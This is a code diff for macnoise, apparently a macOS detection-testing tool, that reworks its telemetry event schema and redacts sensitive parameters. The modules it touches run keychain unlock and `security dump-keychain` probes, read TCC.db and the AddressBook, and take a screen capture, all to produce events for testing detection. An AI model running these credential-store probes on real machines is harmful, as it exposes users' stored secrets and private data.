@@ -52,7 +52,7 @@ func (t *tccContacts) Generate(ctx context.Context, params module.Params, emit m
 	}
 
 	info := t.Info()
-	ev := output.NewEvent(info, "tcc_contacts_probe", true, fmt.Sprintf("enumerating %s", abPath))
+	ev := output.NewEvent(info, "tcc_contacts_probe", module.OutcomeExecuted, module.Resource("tcc_contacts", "AddressBook", abPath), fmt.Sprintf("enumerating %s", abPath))
 	details := map[string]any{"path": abPath}
 
 	entries, err := os.ReadDir(abPath)
@@ -73,8 +73,7 @@ func (t *tccContacts) Generate(ctx context.Context, params module.Params, emit m
 
 	ev = output.WithOutcome(ev, eventOutcome(outcome), err)
 	ev = output.WithDetails(ev, details)
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (t *tccContacts) DryRun(params module.Params) []string {

--- a/modules/tcc/fda.go
+++ b/modules/tcc/fda.go
@@ -71,7 +71,7 @@ func (t *tccFDA) Generate(ctx context.Context, params module.Params, emit module
 	}
 	info := t.Info()
 
-	ev := output.NewEvent(info, "tcc_fda_probe", true, fmt.Sprintf("attempting to read %s", tccPath))
+	ev := output.NewEvent(info, "tcc_fda_probe", module.OutcomeExecuted, module.Resource("tcc_fda", "TCC.db", tccPath), fmt.Sprintf("attempting to read %s", tccPath))
 	details := map[string]any{"path": tccPath}
 
 	f, err := os.Open(tccPath)
@@ -95,8 +95,7 @@ func (t *tccFDA) Generate(ctx context.Context, params module.Params, emit module
 
 	ev = output.WithOutcome(ev, eventOutcome(outcome), err)
 	ev = output.WithDetails(ev, details)
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (t *tccFDA) DryRun(params module.Params) []string {

--- a/modules/tcc/keychain.go
+++ b/modules/tcc/keychain.go
@@ -41,6 +41,7 @@ func (t *tccKeychain) ParamSpecs() []module.ParamSpec {
 			Name:        "password",
 			Description: "Password for unlock attempt (empty causes expected failure telemetry)",
 			Type:        module.ParamString,
+			Sensitive:   true,
 			Default:     "",
 			Example:     "hunter2",
 		},
@@ -62,18 +63,20 @@ func (t *tccKeychain) Generate(ctx context.Context, params module.Params, emit m
 		keychainPath = filepath.Join(home, "Library", "Keychains", "login.keychain-db")
 	}
 
-	listEv := output.NewEvent(info, "keychain_list", false, "listing keychains via security list-keychains")
+	listEv := output.NewEvent(info, "keychain_list", module.OutcomeError, module.Resource("keychain", "configured keychains", keychainPath), "listing keychains via security list-keychains")
 	listOut, listErr := exec.CommandContext(ctx, "security", "list-keychains").CombinedOutput()
 	if listErr != nil {
 		listEv = output.WithError(listEv, listErr)
 	} else {
-		listEv.Success = true
+		listEv.Outcome = module.OutcomeExecuted
 		listEv.Message = "keychain list retrieved"
 		listEv = output.WithDetails(listEv, map[string]any{"keychains": string(listOut)})
 	}
-	emit(listEv)
+	if err := emit(listEv); err != nil {
+		return err
+	}
 
-	unlockEv := output.NewEvent(info, "keychain_unlock_attempt", false, fmt.Sprintf("attempting keychain unlock: %s", keychainPath))
+	unlockEv := output.NewEvent(info, "keychain_unlock_attempt", module.OutcomeError, module.Resource("keychain", "login keychain", keychainPath), fmt.Sprintf("attempting keychain unlock: %s", keychainPath))
 	unlockOut, unlockErr := exec.CommandContext(ctx, "security", "unlock-keychain", "-p", password, keychainPath).CombinedOutput()
 	if unlockErr != nil {
 		unlockEv = output.WithOutcome(unlockEv, module.OutcomeDenied, nil)
@@ -84,13 +87,15 @@ func (t *tccKeychain) Generate(ctx context.Context, params module.Params, emit m
 			"output": string(unlockOut),
 		})
 	} else {
-		unlockEv.Success = true
+		unlockEv.Outcome = module.OutcomeExecuted
 		unlockEv.Message = fmt.Sprintf("keychain unlocked: %s", keychainPath)
 		unlockEv = output.WithDetails(unlockEv, map[string]any{"path": keychainPath, "result": "granted"})
 	}
-	emit(unlockEv)
+	if err := emit(unlockEv); err != nil {
+		return err
+	}
 
-	dumpEv := output.NewEvent(info, "keychain_dump_attempt", false, fmt.Sprintf("probing keychain dump: %s", keychainPath))
+	dumpEv := output.NewEvent(info, "keychain_dump_attempt", module.OutcomeError, module.Resource("keychain", "login keychain", keychainPath), fmt.Sprintf("probing keychain dump: %s", keychainPath))
 	dumpOut, dumpErr := exec.CommandContext(ctx, "security", "dump-keychain", keychainPath).CombinedOutput()
 	if dumpErr != nil {
 		dumpEv = output.WithOutcome(dumpEv, module.OutcomeDenied, nil)
@@ -101,13 +106,11 @@ func (t *tccKeychain) Generate(ctx context.Context, params module.Params, emit m
 			"output": string(dumpOut),
 		})
 	} else {
-		dumpEv.Success = true
+		dumpEv.Outcome = module.OutcomeExecuted
 		dumpEv.Message = fmt.Sprintf("keychain dump succeeded for %s", keychainPath)
 		dumpEv = output.WithDetails(dumpEv, map[string]any{"path": keychainPath, "result": "granted"})
 	}
-	emit(dumpEv)
-
-	return nil
+	return emit(dumpEv)
 }
 
 func (t *tccKeychain) DryRun(params module.Params) []string {

--- a/modules/tcc/keychain_integration_test.go
+++ b/modules/tcc/keychain_integration_test.go
@@ -19,7 +19,7 @@ func TestKeychainGenerate_EmitsThreeProbes(t *testing.T) {
 	bogus := filepath.Join(t.TempDir(), "nope.keychain-db")
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureTCCEvents(&events)
 	if err := (&tccKeychain{}).Generate(context.Background(), module.Params{"keychain_path": bogus}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
@@ -36,8 +36,8 @@ func TestKeychainGenerate_EmitsThreeProbes(t *testing.T) {
 
 	// Unlock of a nonexistent keychain with no password is reliably refused.
 	unlock := events[1]
-	if unlock.ResolvedOutcome() != module.OutcomeDenied {
-		t.Errorf("unlock outcome = %q, want denied", unlock.ResolvedOutcome())
+	if unlock.Outcome != module.OutcomeDenied {
+		t.Errorf("unlock outcome = %q, want denied", unlock.Outcome)
 	}
 	if unlock.Details["result"] != "denied" {
 		t.Errorf("unlock result detail = %v, want denied", unlock.Details["result"])
@@ -46,7 +46,7 @@ func TestKeychainGenerate_EmitsThreeProbes(t *testing.T) {
 	// The dump attempt must at least run and be recorded as a real observation,
 	// never a macnoise error.
 	dump := events[2]
-	if o := dump.ResolvedOutcome(); o != module.OutcomeExecuted && o != module.OutcomeDenied {
+	if o := dump.Outcome; o != module.OutcomeExecuted && o != module.OutcomeDenied {
 		t.Errorf("dump outcome = %q, want executed or denied", o)
 	}
 }

--- a/modules/tcc/keychain_test.go
+++ b/modules/tcc/keychain_test.go
@@ -19,3 +19,15 @@ func TestKeychainDryRun(t *testing.T) {
 		}
 	}
 }
+
+func TestKeychainPasswordIsSensitive(t *testing.T) {
+	for _, spec := range (&tccKeychain{}).ParamSpecs() {
+		if spec.Name == "password" {
+			if !spec.Sensitive {
+				t.Fatal("password parameter is not marked sensitive")
+			}
+			return
+		}
+	}
+	t.Fatal("password parameter spec not found")
+}

--- a/modules/tcc/perms_integration_test.go
+++ b/modules/tcc/perms_integration_test.go
@@ -13,7 +13,7 @@ import (
 func runPerm(t *testing.T, gen module.Generator) module.TelemetryEvent {
 	t.Helper()
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureTCCEvents(&events)
 	if err := gen.Generate(context.Background(), module.Params{}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
@@ -35,9 +35,6 @@ func TestAccessibility_ClassifiesEnvironmentWithoutFailing(t *testing.T) {
 	}
 	switch ev.Outcome {
 	case module.OutcomeExecuted, module.OutcomeDenied, module.OutcomeIndeterminate:
-		if !ev.Success {
-			t.Errorf("outcome %q left Success false; only a real fault should", ev.Outcome)
-		}
 	default:
 		t.Errorf("adding reported an unexpected outcome %q: %s", ev.Outcome, ev.Error)
 	}
@@ -55,9 +52,6 @@ func TestScreenRecording_NeverClaimsAVerdict(t *testing.T) {
 	}
 	if ev.Outcome != module.OutcomeExecuted && ev.Outcome != module.OutcomeIndeterminate {
 		t.Errorf("outcome = %q, want executed or indeterminate (never a grant verdict)", ev.Outcome)
-	}
-	if !ev.Success {
-		t.Errorf("Success = false; a capture attempt is not a macnoise fault: %s", ev.Error)
 	}
 	if ev.Details["permission"] != "indeterminate" {
 		t.Errorf("permission = %v, want indeterminate (the CLI cannot read the grant)", ev.Details["permission"])

--- a/modules/tcc/probe_integration_test.go
+++ b/modules/tcc/probe_integration_test.go
@@ -12,10 +12,17 @@ import (
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
+func captureTCCEvents(events *[]module.TelemetryEvent) module.EventEmitter {
+	return func(ev module.TelemetryEvent) error {
+		*events = append(*events, ev)
+		return nil
+	}
+}
+
 func runProbe(t *testing.T, gen module.Generator, params module.Params) module.TelemetryEvent {
 	t.Helper()
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureTCCEvents(&events)
 
 	if err := gen.Generate(context.Background(), params, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -51,8 +58,8 @@ func TestTCCFDA_MissingPathIsAbsentNotDenied(t *testing.T) {
 	if ev.Details["result"] != "absent" {
 		t.Errorf("result = %v, want absent", ev.Details["result"])
 	}
-	if !ev.Success {
-		t.Error("Success = false, want true: an absent target is a valid observation")
+	if ev.Outcome != module.OutcomeIndeterminate {
+		t.Errorf("Outcome = %q, want indeterminate", ev.Outcome)
 	}
 	if ev.Outcome != module.OutcomeIndeterminate {
 		t.Errorf("outcome = %q, want %q", ev.Outcome, module.OutcomeIndeterminate)
@@ -79,8 +86,8 @@ func TestTCCFDA_UnreadableFileIsDenied(t *testing.T) {
 	if ev.Outcome != module.OutcomeDenied {
 		t.Errorf("outcome = %q, want %q", ev.Outcome, module.OutcomeDenied)
 	}
-	if !ev.Success {
-		t.Error("Success = false: a TCC denial is expected telemetry, not a macnoise failure")
+	if ev.Outcome != module.OutcomeDenied {
+		t.Errorf("Outcome = %q, want denied", ev.Outcome)
 	}
 }
 
@@ -132,8 +139,8 @@ func TestTCCContacts_NoAddressBookIsAbsentNotDenied(t *testing.T) {
 	if ev.Details["result"] != "absent" {
 		t.Errorf("result = %v, want absent", ev.Details["result"])
 	}
-	if !ev.Success {
-		t.Error("Success = false, want true: an absent target is a valid observation")
+	if ev.Outcome != module.OutcomeIndeterminate {
+		t.Errorf("Outcome = %q, want indeterminate", ev.Outcome)
 	}
 	if ev.Outcome != module.OutcomeIndeterminate {
 		t.Errorf("outcome = %q, want %q", ev.Outcome, module.OutcomeIndeterminate)

--- a/modules/tcc/screen_recording.go
+++ b/modules/tcc/screen_recording.go
@@ -84,7 +84,7 @@ func (t *tccScreenRecording) Generate(ctx context.Context, params module.Params,
 	}
 	outcome := screenCaptureOutcome(runErr, bytes)
 
-	ev := output.NewEvent(info, "screen_capture_attempt", true, "attempting screen capture via screencapture")
+	ev := output.NewEvent(info, "screen_capture_attempt", outcome, module.Resource("tcc_screen_recording", "main display", ""), "attempting screen capture via screencapture")
 	details := map[string]any{
 		"tool":            "screencapture",
 		"bytes_captured":  bytes,
@@ -104,8 +104,7 @@ func (t *tccScreenRecording) Generate(ctx context.Context, params module.Params,
 		probeErr = fmt.Errorf("screencapture: %v: %s", runErr, strings.TrimSpace(string(out)))
 	}
 	ev = output.WithOutcome(ev, outcome, probeErr)
-	emit(output.WithDetails(ev, details))
-	return nil
+	return emit(output.WithDetails(ev, details))
 }
 
 func (t *tccScreenRecording) DryRun(params module.Params) []string {

--- a/modules/xpc/enumerate.go
+++ b/modules/xpc/enumerate.go
@@ -91,9 +91,9 @@ func parseServices(out, filter string, max int) []string {
 
 // enumerateDomain runs launchctl print against one domain and emits an event
 // describing what it found or why it could not look.
-func (x *xpcEnumerate) enumerateDomain(ctx context.Context, domain, filter string, max int, emit module.EventEmitter) {
+func (x *xpcEnumerate) enumerateDomain(ctx context.Context, domain, filter string, max int, emit module.EventEmitter) error {
 	info := x.Info()
-	ev := output.NewEvent(info, "xpc_enumerate", true, fmt.Sprintf("enumerating services in domain %s", domain))
+	ev := output.NewEvent(info, "xpc_enumerate", module.OutcomeExecuted, module.Resource("xpc_domain", domain, ""), fmt.Sprintf("enumerating services in domain %s", domain))
 	details := map[string]any{"domain": domain, "filter": filter}
 
 	out, err := exec.CommandContext(ctx, "launchctl", "print", domain).CombinedOutput()
@@ -102,8 +102,7 @@ func (x *xpcEnumerate) enumerateDomain(ctx context.Context, domain, filter strin
 			fmt.Errorf("launchctl print %s: %v: %s", domain, err, out))
 		ev.Message = fmt.Sprintf("could not enumerate domain %s", domain)
 		details["accessible"] = false
-		emit(output.WithDetails(ev, details))
-		return
+		return emit(output.WithDetails(ev, details))
 	}
 
 	services := parseServices(string(out), filter, max)
@@ -111,7 +110,7 @@ func (x *xpcEnumerate) enumerateDomain(ctx context.Context, domain, filter strin
 	details["accessible"] = true
 	details["service_count"] = len(services)
 	details["services"] = services
-	emit(output.WithDetails(ev, details))
+	return emit(output.WithDetails(ev, details))
 }
 
 func (x *xpcEnumerate) Generate(ctx context.Context, params module.Params, emit module.EventEmitter) error {
@@ -123,9 +122,10 @@ func (x *xpcEnumerate) Generate(ctx context.Context, params module.Params, emit 
 	// as uid 501), so gating it behind root would drop most of what this
 	// module can see. A domain that does refuse is reported as inaccessible
 	// rather than skipped.
-	x.enumerateDomain(ctx, guiDomain(), filter, max, emit)
-	x.enumerateDomain(ctx, "system", filter, max, emit)
-	return nil
+	if err := x.enumerateDomain(ctx, guiDomain(), filter, max, emit); err != nil {
+		return err
+	}
+	return x.enumerateDomain(ctx, "system", filter, max, emit)
 }
 
 // guiDomain is the launchd domain holding the current user's services.

--- a/modules/xpc/enumerate_integration_test.go
+++ b/modules/xpc/enumerate_integration_test.go
@@ -73,7 +73,7 @@ func TestSystemDomain_PrivilegeRequirement(t *testing.T) {
 func TestXPCEnumerate_EmitsPerDomain(t *testing.T) {
 	x := &xpcEnumerate{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	if err := x.Generate(context.Background(), module.Params{"filter": ""}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -87,7 +87,7 @@ func TestXPCEnumerate_EmitsPerDomain(t *testing.T) {
 		if ev.EventType != "xpc_enumerate" {
 			t.Errorf("EventType = %q, want xpc_enumerate", ev.EventType)
 		}
-		if !ev.Success {
+		if ev.Outcome != module.OutcomeExecuted {
 			t.Errorf("Success = false for domain %v; an unreadable domain is still valid telemetry", ev.Details["domain"])
 		}
 		if ev.Details["domain"] == "" {

--- a/pkg/module/catalog.go
+++ b/pkg/module/catalog.go
@@ -34,6 +34,7 @@ type CatalogParam struct {
 	Description string        `json:"description"`
 	Type        ParamType     `json:"type"`
 	Required    bool          `json:"required"`
+	Sensitive   bool          `json:"sensitive"`
 	Default     any           `json:"default,omitempty"`
 	Example     any           `json:"example,omitempty"`
 	Range       *IntegerRange `json:"range,omitempty"`

--- a/pkg/module/catalog_test.go
+++ b/pkg/module/catalog_test.go
@@ -23,7 +23,7 @@ func (catalogTestGen) Info() ModuleInfo {
 }
 func (catalogTestGen) ParamSpecs() []ParamSpec {
 	return []ParamSpec{
-		{Name: "target", Description: "the target", Type: ParamString, Required: true, Default: "1.2.3.4", Example: "10.0.0.1"},
+		{Name: "target", Description: "the target", Type: ParamString, Required: true, Sensitive: true, Default: "1.2.3.4", Example: "10.0.0.1"},
 	}
 }
 func (catalogTestGen) CheckPrereqs(ctx context.Context, params Params) error { return nil }
@@ -48,7 +48,7 @@ func TestNewCatalogEntry(t *testing.T) {
 	if e.MITRE[1].SubTechnique != "" {
 		t.Errorf("sub_technique should be empty for technique-only mapping, got %q", e.MITRE[1].SubTechnique)
 	}
-	if len(e.Params) != 1 || e.Params[0].Name != "target" || e.Params[0].Type != ParamString || !e.Params[0].Required || e.Params[0].Default != "1.2.3.4" {
+	if len(e.Params) != 1 || e.Params[0].Name != "target" || e.Params[0].Type != ParamString || !e.Params[0].Required || !e.Params[0].Sensitive || e.Params[0].Default != "1.2.3.4" {
 		t.Errorf("params mapped wrong: %+v", e.Params)
 	}
 }

--- a/pkg/module/event_test.go
+++ b/pkg/module/event_test.go
@@ -1,0 +1,41 @@
+package module
+
+import "testing"
+
+func TestSubjectValidate(t *testing.T) {
+	tests := []struct {
+		name    string
+		subject Subject
+		wantErr bool
+	}{
+		{name: "file", subject: File("/tmp/example")},
+		{name: "process", subject: Process("sh", "/bin/sh", "sh -c true", 42)},
+		{name: "network", subject: Network("127.0.0.1:443", "", "")},
+		{name: "service", subject: Service("com.example.agent", "gui/501", "")},
+		{name: "resource", subject: Resource("tcc", "contacts", "~/Library/Application Support/AddressBook")},
+		{name: "missing", wantErr: true},
+		{name: "multiple", subject: Subject{File: &FileSubject{Path: "/tmp/x"}, Process: &ProcessSubject{PID: 1}}, wantErr: true},
+		{name: "empty file", subject: Subject{File: &FileSubject{}}, wantErr: true},
+		{name: "empty resource kind", subject: Subject{Resource: &ResourceSubject{Name: "x"}}, wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := tt.subject.Validate()
+			if (err != nil) != tt.wantErr {
+				t.Fatalf("Validate() error = %v, wantErr %v", err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func TestOutcomeValid(t *testing.T) {
+	for _, outcome := range []Outcome{OutcomeExecuted, OutcomeDenied, OutcomeIndeterminate, OutcomeError} {
+		if !outcome.Valid() {
+			t.Errorf("outcome %q is not valid", outcome)
+		}
+	}
+	if Outcome("").Valid() || Outcome("success").Valid() {
+		t.Error("unknown outcomes must be invalid")
+	}
+}

--- a/pkg/module/interface.go
+++ b/pkg/module/interface.go
@@ -5,6 +5,7 @@ package module
 
 import (
 	"context"
+	"fmt"
 	"time"
 )
 
@@ -49,6 +50,7 @@ type ParamSpec struct {
 	Description string
 	Type        ParamType
 	Required    bool
+	Sensitive   bool
 	Default     any
 	Example     any
 	Range       *IntegerRange
@@ -108,18 +110,139 @@ const (
 	OutcomeError Outcome = "error"
 )
 
+// Valid reports whether o is one of the supported event outcomes.
+func (o Outcome) Valid() bool {
+	switch o {
+	case OutcomeExecuted, OutcomeDenied, OutcomeIndeterminate, OutcomeError:
+		return true
+	default:
+		return false
+	}
+}
+
+// Subject identifies the concrete target of an event. Exactly one typed
+// subject must be present, which keeps consumers out of the untyped Details
+// map when correlating the action to a file, process, endpoint, or resource.
+type Subject struct {
+	File     *FileSubject     `json:"file,omitempty"`
+	Process  *ProcessSubject  `json:"process,omitempty"`
+	Network  *NetworkSubject  `json:"network,omitempty"`
+	Service  *ServiceSubject  `json:"service,omitempty"`
+	Resource *ResourceSubject `json:"resource,omitempty"`
+}
+
+// FileSubject identifies a file-system target.
+type FileSubject struct {
+	Name string `json:"name,omitempty"`
+	Path string `json:"path,omitempty"`
+}
+
+// ProcessSubject identifies a process target or command execution.
+type ProcessSubject struct {
+	PID        int    `json:"pid,omitempty"`
+	Name       string `json:"name,omitempty"`
+	Executable string `json:"executable,omitempty"`
+	Command    string `json:"command,omitempty"`
+}
+
+// NetworkSubject identifies a network endpoint.
+type NetworkSubject struct {
+	Address string `json:"address,omitempty"`
+	URL     string `json:"url,omitempty"`
+	Domain  string `json:"domain,omitempty"`
+}
+
+// ServiceSubject identifies a persistence or service target.
+type ServiceSubject struct {
+	Name   string `json:"name,omitempty"`
+	Domain string `json:"domain,omitempty"`
+	Path   string `json:"path,omitempty"`
+}
+
+// ResourceSubject identifies an API or operating-system resource that is not
+// a file, process, network endpoint, or service.
+type ResourceSubject struct {
+	Kind string `json:"kind"`
+	Name string `json:"name,omitempty"`
+	Path string `json:"path,omitempty"`
+}
+
+// File returns a typed file subject.
+func File(path string) Subject {
+	return Subject{File: &FileSubject{Path: path}}
+}
+
+// Process returns a typed process subject.
+func Process(name, executable, command string, pid int) Subject {
+	return Subject{Process: &ProcessSubject{PID: pid, Name: name, Executable: executable, Command: command}}
+}
+
+// Network returns a typed network subject.
+func Network(address, url, domain string) Subject {
+	return Subject{Network: &NetworkSubject{Address: address, URL: url, Domain: domain}}
+}
+
+// Service returns a typed service subject.
+func Service(name, domain, path string) Subject {
+	return Subject{Service: &ServiceSubject{Name: name, Domain: domain, Path: path}}
+}
+
+// Resource returns a typed generic resource subject.
+func Resource(kind, name, path string) Subject {
+	return Subject{Resource: &ResourceSubject{Kind: kind, Name: name, Path: path}}
+}
+
+// Validate requires exactly one typed subject with an identifying value.
+func (s Subject) Validate() error {
+	count := 0
+	if s.File != nil {
+		count++
+		if s.File.Name == "" && s.File.Path == "" {
+			return fmt.Errorf("file subject has no identity")
+		}
+	}
+	if s.Process != nil {
+		count++
+		if s.Process.PID == 0 && s.Process.Name == "" && s.Process.Executable == "" && s.Process.Command == "" {
+			return fmt.Errorf("process subject has no identity")
+		}
+	}
+	if s.Network != nil {
+		count++
+		if s.Network.Address == "" && s.Network.URL == "" && s.Network.Domain == "" {
+			return fmt.Errorf("network subject has no identity")
+		}
+	}
+	if s.Service != nil {
+		count++
+		if s.Service.Name == "" && s.Service.Domain == "" && s.Service.Path == "" {
+			return fmt.Errorf("service subject has no identity")
+		}
+	}
+	if s.Resource != nil {
+		count++
+		if s.Resource.Kind == "" {
+			return fmt.Errorf("resource subject has no kind")
+		}
+		if s.Resource.Name == "" && s.Resource.Path == "" {
+			return fmt.Errorf("resource subject has no identity")
+		}
+	}
+	if count != 1 {
+		return fmt.Errorf("event must have exactly one subject, got %d", count)
+	}
+	return nil
+}
+
 // TelemetryEvent is the structured record emitted by a module for each action it performs.
 type TelemetryEvent struct {
-	SchemaVersion string    `json:"schema_version"`
-	Timestamp     time.Time `json:"timestamp"`
-	Module        string    `json:"module"`
-	Category      string    `json:"category"`
-	EventType     string    `json:"event_type"`
-	Success       bool      `json:"success"`
-	// Outcome is left empty by NewEvent and set only by modules that need to
-	// say something Success cannot express. It is resolved to a concrete value
-	// at the output boundary, so emitted records always carry one.
+	SchemaVersion  string         `json:"schema_version"`
+	Timestamp      time.Time      `json:"timestamp"`
+	Module         string         `json:"module"`
+	Category       string         `json:"category"`
+	EventType      string         `json:"event_type"`
 	Outcome        Outcome        `json:"outcome"`
+	Subject        Subject        `json:"subject"`
 	Message        string         `json:"message"`
 	Details        map[string]any `json:"details,omitempty"`
 	Error          string         `json:"error,omitempty"`
@@ -127,22 +250,8 @@ type TelemetryEvent struct {
 	ProcessContext ProcessContext `json:"process_context"`
 }
 
-// ResolvedOutcome returns ev.Outcome, falling back to Success for the majority
-// of events that never set one. It is the single definition of how the two
-// fields relate, so an outcome-aware consumer and a Success-only consumer can
-// never read the same event differently.
-func (ev TelemetryEvent) ResolvedOutcome() Outcome {
-	if ev.Outcome != "" {
-		return ev.Outcome
-	}
-	if ev.Success {
-		return OutcomeExecuted
-	}
-	return OutcomeError
-}
-
 // EventEmitter is a callback that receives a telemetry event from a module.
-type EventEmitter func(TelemetryEvent)
+type EventEmitter func(TelemetryEvent) error
 
 // Generator is implemented by every MacNoise module and drives the runner lifecycle.
 type Generator interface {

--- a/pkg/module/params.go
+++ b/pkg/module/params.go
@@ -7,6 +7,9 @@ import (
 	"strings"
 )
 
+// RedactedValue replaces sensitive values in managed logs.
+const RedactedValue = "[REDACTED]"
+
 // NormalizeParams validates input against specs, applies defaults only to
 // omitted values, and returns values using the declared runtime types.
 func NormalizeParams(specs []ParamSpec, input Params) (Params, error) {
@@ -85,6 +88,23 @@ func ValidateParamSpecs(specs []ParamSpec) error {
 		}
 	}
 	return nil
+}
+
+// RedactParams returns a copy of params with values declared sensitive by the
+// module contract replaced before they reach managed logs.
+func RedactParams(specs []ParamSpec, params Params) Params {
+	redacted := make(Params, len(params))
+	for name, value := range params {
+		redacted[name] = value
+	}
+	for _, spec := range specs {
+		if spec.Sensitive {
+			if _, ok := redacted[spec.Name]; ok {
+				redacted[spec.Name] = RedactedValue
+			}
+		}
+	}
+	return redacted
 }
 
 func validParamType(paramType ParamType) bool {

--- a/pkg/module/params_test.go
+++ b/pkg/module/params_test.go
@@ -88,3 +88,21 @@ func TestNormalizeParamsRejectsInvalidInputs(t *testing.T) {
 		})
 	}
 }
+
+func TestRedactParams(t *testing.T) {
+	params := Params{"target": "example.com", "password": "real-secret"}
+	redacted := RedactParams([]ParamSpec{
+		{Name: "target", Type: ParamString},
+		{Name: "password", Type: ParamString, Sensitive: true},
+	}, params)
+
+	if redacted.String("target", "") != "example.com" {
+		t.Errorf("target = %q, want preserved", redacted["target"])
+	}
+	if redacted.String("password", "") != RedactedValue {
+		t.Errorf("password = %q, want redacted", redacted["password"])
+	}
+	if params.String("password", "") != "real-secret" {
+		t.Error("RedactParams mutated its input")
+	}
+}


### PR DESCRIPTION
Telemetry events now use schema 2.0 with one authoritative outcome and a required typed subject, while the runner normalizes identity and timestamps. Sensitive audit inputs are redacted and telemetry and audit writer failures now reach command exit status instead of being dropped.

Validation: Go 1.27.1 tests, vet, golangci-lint, govulncheck, Darwin amd64 and arm64 builds, and integration-tag compilation.